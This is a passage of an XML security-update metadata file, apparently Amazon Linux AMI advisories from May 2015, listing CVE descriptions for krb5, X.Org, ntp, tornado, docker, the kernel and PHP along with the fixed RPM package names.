arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.45-30.b13.5.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-518</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-518: medium priority package update for krb5</title><issued date="2015-05-05 15:44:00" /><updated date="2015-05-05 16:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9422:
It was found that the MIT Kerberos administration server (kadmind) incorrectly accepted certain authentication requests for two-component server principal names. A remote attacker able to acquire a key with a particularly named principal (such as "kad/x") could use this flaw to impersonate any user to kadmind, and perform administrative actions as that user.
CVE-2014-9421:
A double-free flaw was found in the way MIT Kerberos handled invalid External Data Representation (XDR) data. An authenticated user could use this flaw to crash the MIT Kerberos administration server (kadmind), or other applications using Kerberos libraries, via specially crafted XDR packets.
CVE-2014-5355:
It was found that the krb5_read_message() function of MIT Kerberos did not correctly sanitize input, and could create invalid krb5_data objects. A remote, unauthenticated attacker could use this flaw to crash a Kerberos child process via a specially crafted request.
CVE-2014-5353:
If kadmind were used with an LDAP back end for the KDC database, a remote, authenticated attacker who has the permissions to set the password policy could crash kadmind by attempting to use a named ticket policy object as a password policy for a principal.
CVE-2014-5352:
A use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5 library processed valid context deletion tokens. An attacker able to make an application using the GSS-API library (libgssapi) could call the gss_process_context_token() function and use this flaw to crash that application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5352" title="" id="CVE-2014-5352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5353" title="" id="CVE-2014-5353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5355" title="" id="CVE-2014-5355" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9421" title="" id="CVE-2014-9421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9422" title="" id="CVE-2014-9422" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0794.html" title="" id="RHSA-2015:0794" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-devel" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.10.3-37.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-519</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-519: medium priority package update for xorg-x11-server</title><issued date="2015-05-05 15:55:00" /><updated date="2015-05-05 16:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0255:
A buffer over-read flaw was found in the way the X.Org server handled XkbGetGeometry requests. A malicious, authorized client could use this flaw to disclose portions of the X.Org server memory, or cause the X.Org server to crash using a specially crafted XkbGetGeometry request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0255" title="" id="CVE-2015-0255" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0797.html" title="" id="RHSA-2015:0797" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xorg" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.15.0" release="26.41.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.15.0-26.41.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.15.0-26.41.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.15.0" release="26.41.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.15.0-26.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-520</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-520: important priority package update for ntp</title><issued date="2015-05-05 15:56:00" /><updated date="2015-05-24 14:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1799:
The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP 3.x and 4.x before 4.2.8p2 performs state-variable updates upon receiving certain invalid packets, which makes it easier for man-in-the-middle attackers to cause a denial of service (synchronization loss) by spoofing the source IP address of a peer.
1199435:
CVE-2015-1799 ntp: authentication doesn't protect symmetric associations against DoS attacks
CVE-2015-1798:
The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP 4.x before 4.2.8p2 requires a correct MAC only if the MAC field has a nonzero length, which makes it easier for man-in-the-middle attackers to spoof packets by omitting the MAC.
1199430:
CVE-2015-1798 ntp: ntpd accepts unauthenticated packets with symmetric key crypto
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798" title="" id="CVE-2015-1798" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799" title="" id="CVE-2015-1799" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-30.24.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-30.24.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-30.24.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-30.24.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-30.24.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-30.24.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-30.24.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="30.24.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-30.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-521</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-521: low priority package update for python-tornado</title><issued date="2015-05-05 21:31:00" /><updated date="2015-05-06 15:14:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2099:
A denial of service flaw was found in the way Python's SSL module implementation performed matching of certain certificate names. A remote attacker able to obtain a valid certificate that contained multiple wildcard characters could use this flaw to issue a request to validate such a certificate, resulting in excessive consumption of CPU.
963260:
CVE-2013-2099 python: ssl.match_hostname() DoS via certificates with specially crafted hostname wildcard patterns
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2099" title="" id="CVE-2013-2099" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-tornado" version="2.2.1" release="7.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-tornado-2.2.1-7.7.amzn1.noarch.rpm</filename></package><package name="python26-tornado" version="2.2.1" release="7.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-tornado-2.2.1-7.7.amzn1.noarch.rpm</filename></package><package name="python27-tornado-doc" version="2.2.1" release="7.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-tornado-doc-2.2.1-7.7.amzn1.noarch.rpm</filename></package><package name="python26-tornado-doc" version="2.2.1" release="7.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-tornado-doc-2.2.1-7.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-522</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-522: critical priority package update for docker</title><issued date="2015-05-07 13:37:00" /><updated date="2015-05-06 13:37:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3631:
reserved
CVE-2015-3630:
reserved
CVE-2015-3629:
reserved
CVE-2015-3627:
reserved
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3627" title="" id="CVE-2015-3627" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3629" title="" id="CVE-2015-3629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3630" title="" id="CVE-2015-3630" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3631" title="" id="CVE-2015-3631" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="1.6.0" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-1.6.0-1.3.amzn1.x86_64.rpm</filename></package><package name="docker-pkg-devel" version="1.6.0" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-pkg-devel-1.6.0-1.3.amzn1.x86_64.rpm</filename></package><package name="docker-devel" version="1.6.0" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-devel-1.6.0-1.3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-523</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-523: medium priority package update for kernel</title><issued date="2015-05-14 14:27:00" /><updated date="2015-05-14 23:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3636:
It was found that the Linux kernel's ping socket implementation did not properly handle socket unhashing during spurious disconnects, which could lead to a use-after-free flaw. On x86-64 architecture systems, a local user able to create ping sockets could use this flaw to crash the system. On non-x86-64 architecture systems, a local user able to create ping sockets could use this flaw to escalate their privileges on the system.
1218074:
CVE-2015-3636 kernel: ping sockets: use-after-free leading to local privilege escalation
CVE-2015-3331:
It was found that the Linux kernel did not correctly decrypt fragmented network packets when using the Intel AES-NI instructions for the AES algorithm. A remote attacker could use this flaw to crash a system by sending specially crafted AES-encrypted packets to that system.
A buffer overflow flaw was found in the way the Linux kernel's Intel AES-NI instructions optimized version of the RFC4106 GCM mode decryption functionality handled fragmented packets. A remote attacker could use this flaw to crash, or potentially escalate their privileges on, a system over a connection with an active AEC-GCM mode IPSec security association.
1213322:
CVE-2015-3331 Kernel: crypto: buffer overruns in RFC4106 implementation using AESNI
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3331" title="" id="CVE-2015-3331" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3636" title="" id="CVE-2015-3636" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.42" release="31.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.42-31.38.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.42" release="31.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.42-31.38.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.42" release="31.38.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.42-31.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-524</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-524: medium priority package update for php</title><issued date="2015-05-14 14:31:00" /><updated date="2015-05-14 23:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2305:
Integer overflow in the regcomp implementation in the Henry Spencer BSD regex library (aka rxspencer) alpha3.8.g5 on 32-bit platforms, as used in NetBSD through 6.1.5 and other products, might allow context-dependent attackers to execute arbitrary code via a large regular expression that leads to a heap-based buffer overflow.
1191049:
CVE-2015-2305 regex: heap overflow in regcomp() on 32-bit architectures
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305" title="" id="CVE-2015-2305" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-common" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-enchant-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.29-1.8.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.29" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.29-1.8.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.29" release="1.8.amzn1" epoch="0" 